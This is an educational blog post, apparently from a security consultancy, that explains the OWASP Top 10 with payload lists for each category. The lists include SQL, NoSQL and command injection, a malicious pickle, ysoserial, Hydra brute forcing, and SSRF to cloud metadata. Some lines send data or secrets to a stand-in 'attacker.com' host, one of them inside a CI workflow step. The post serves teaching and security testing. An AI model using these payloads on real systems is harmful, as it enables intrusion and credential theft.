Skip to main content
🧠Educationalintermediate5 min read

OWASP Top 10: Explained with Payloads

A practical guide to the OWASP Top 10 vulnerabilities with real payloads and examples for each category.

OWASPweb securitypayloadsinjectionXSS
Share:𝕏in

OWASP Top 10: Explained with Payloads

The OWASP Top 10 represents the most critical web application security risks. This guide provides practical payloads and examples for each category (2021 edition).

A01:2021 – Broken Access Control

Access control enforces that users cannot act outside their intended permissions.

Vertical Privilege Escalation

Scenario: Regular user accessing admin functions

# Original request as regular user
GET /user/profile HTTP/1.1
Cookie: session=regular_user_token

# Try admin endpoint
GET /admin/users HTTP/1.1
Cookie: session=regular_user_token

Horizontal Privilege Escalation (IDOR)

Parameter manipulation:

# Original
GET /api/users/123/documents HTTP/1.1

# IDOR test
GET /api/users/124/documents HTTP/1.1
GET /api/users/1/documents HTTP/1.1

JSON body manipulation:

POST /api/transfer HTTP/1.1
Content-Type: application/json

{"from":"my_account","to":"other_account","amount":100}

# Modified
{"from":"victim_account","to":"my_account","amount":1000}

Metadata Manipulation

# JWT token manipulation
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoidXNlciJ9.xxx

# Change to admin
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4ifQ.xxx

# Algorithm confusion (use 'none')
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJyb2xlIjoiYWRtaW4ifQ.

Force Browsing

/admin/
/admin/dashboard
/administrator/
/management/
/backup/
/config/

A02:2021 – Cryptographic Failures

Sensitive data exposed due to weak or missing cryptography.

Detection Payloads

Check for HTTP where HTTPS needed:

curl -I http://target.com/login
# Look for redirect to HTTPS or sensitive data over HTTP

Check SSL/TLS configuration:

sslscan target.com
testssl.sh target.com

Common Issues to Check

# Sensitive data in URL
https://target.com/reset?token=abc123&email=user@test.com

# API keys in JavaScript
grep -r "api_key\|apikey\|secret" *.js

# Hardcoded credentials
grep -r "password\s*=\|passwd\s*=" *

A03:2021 – Injection

Untrusted data sent to an interpreter.

SQL Injection

Error-based:

' OR '1'='1'--
' OR '1'='1'/*
" OR "1"="1"--
') OR ('1'='1'--

Union-based:

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT username,password,NULL FROM users--

Time-based blind:

# MySQL
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--

# PostgreSQL
' AND pg_sleep(5)--

# MSSQL
'; WAITFOR DELAY '0:0:5'--

Boolean-based blind:

' AND '1'='1' -- (true condition)
' AND '1'='2' -- (false condition)
' AND SUBSTRING(username,1,1)='a'--

NoSQL Injection

MongoDB:

{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}}

Command Injection

; ls -la
| cat /etc/passwd
`whoami`
$(id)
& ping -c 1 attacker.com &
|| curl attacker.com/$(whoami)

LDAP Injection

*)(uid=*))(|(uid=*
admin)(&)
*)(|(password=*))

A04:2021 – Insecure Design

Design flaws that cannot be fixed by perfect implementation.

Business Logic Testing

Rate limiting bypass:

# Multiple accounts
# Race conditions
# Parameter manipulation to skip steps

Workflow bypass:

# Skip payment step
POST /order/confirm HTTP/1.1
# Without going through /order/payment

A05:2021 – Security Misconfiguration

Missing hardening, default configs, verbose errors.

Default Credentials

admin:admin
admin:password
root:root
test:test
administrator:administrator

Directory Listing

/
/images/
/uploads/
/backup/
/temp/

Verbose Errors

# Trigger errors
GET /api/user/' HTTP/1.1
GET /api/user/{{invalid}} HTTP/1.1
GET /api/user/999999999999 HTTP/1.1

HTTP Headers Check

# Missing security headers
curl -I https://target.com | grep -E "X-Frame|X-Content|Content-Security|Strict-Transport"

A06:2021 – Vulnerable Components

Using components with known vulnerabilities.

Detection

# Check JavaScript libraries
retire.js --scan

# Check npm packages
npm audit

# Check Python packages  
safety check

# Generic scanning
dependency-check --project test --scan .

Exploitation

Once identified, search:

site:exploit-db.com [component] [version]
site:github.com [component] CVE

A07:2021 – Identification and Authentication Failures

Weak authentication implementations.

Brute Force

# Hydra
hydra -l admin -P passwords.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# Custom script
for pass in $(cat passwords.txt); do
    curl -s -d "user=admin&pass=$pass" https://target.com/login | grep -q "Welcome" && echo $pass
done

Session Attacks

# Session fixation
https://target.com/login?SESSIONID=attacker_controlled

# Session in URL
https://target.com/dashboard?sid=abc123

# Predictable session
# Check for sequential or predictable patterns

Password Reset Flaws

# Token in response
POST /forgot-password HTTP/1.1
{"email":"victim@test.com"}

# Host header injection
POST /forgot-password HTTP/1.1
Host: attacker.com

# Token manipulation
https://target.com/reset?token=abc123&email=victim@test.com
https://target.com/reset?token=abc123&email=attacker@test.com

A08:2021 – Software and Data Integrity Failures

Code and infrastructure without integrity verification.

Insecure Deserialization

PHP:

O:8:"stdClass":1:{s:4:"test";s:4:"data";}

# Dangerous
O:8:"Malicious":1:{s:4:"exec";s:6:"whoami";}

Java:

# ysoserial
java -jar ysoserial.jar CommonsCollections1 'calc.exe' | base64

Python pickle:

import pickle
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('whoami',))

pickle.dumps(Exploit())

CI/CD Attacks

# Malicious workflow
steps:
  - run: curl attacker.com/$(cat /secrets/api_key)

A09:2021 – Security Logging and Monitoring Failures

Insufficient logging to detect attacks.

Log Injection

User-Agent: Mozilla/5.0\n[CRITICAL] Admin logged in from 1.2.3.4
Username: admin\nSuccessful login

Testing Detection

Perform obvious attacks and check if:

  • Alerts are triggered
  • Logs capture the attempt
  • Response time indicates detection

A10:2021 – Server-Side Request Forgery (SSRF)

Server makes requests to unintended locations.

Basic SSRF

# Parameter
?url=http://127.0.0.1/admin
?url=http://localhost/admin
?url=http://[::1]/admin

# File protocol
?url=file:///etc/passwd

# Cloud metadata
?url=http://169.254.169.254/latest/meta-data/
?url=http://metadata.google.internal/

Bypass Techniques

# Decimal IP
http://2130706433/ (127.0.0.1)

# Hex IP
http://0x7f000001/

# Octal
http://0177.0.0.1/

# URL encoding
http://127.0.0.1%23@evil.com/

# DNS rebinding
http://evil.attacker.com/ (resolves to 127.0.0.1)

# IPv6
http://[::1]/
http://[0:0:0:0:0:ffff:127.0.0.1]/

Blind SSRF

# Use Burp Collaborator or similar
?url=http://collaborator.net/
?url=http://$(whoami).attacker.com/

Quick Reference Cheat Sheet

VulnerabilityQuick Test
SQLi', ", ' OR '1'='1
XSS<script>alert(1)</script>
SSRFhttp://127.0.0.1
LFI../../../etc/passwd
RCE; id, `
IDORChange ID parameters
AuthDefault creds, brute force

Testing Methodology

  1. Understand the application — Map functionality
  2. Identify input points — Parameters, headers, cookies
  3. Test systematically — Each input, each vulnerability type
  4. Verify findings — Confirm exploitability
  5. Document everything — Evidence and impact

Need help testing your web applications? Contact us: m1k3@msquarellc.net

Found this helpful? Share it:

Share:𝕏in

Need Help With This?

Have questions about implementing these security practices? Let's discuss your specific needs.

Get in Touch

More in Educational

Explore more articles in this category.

Browse 🧠 Educational

Related Articles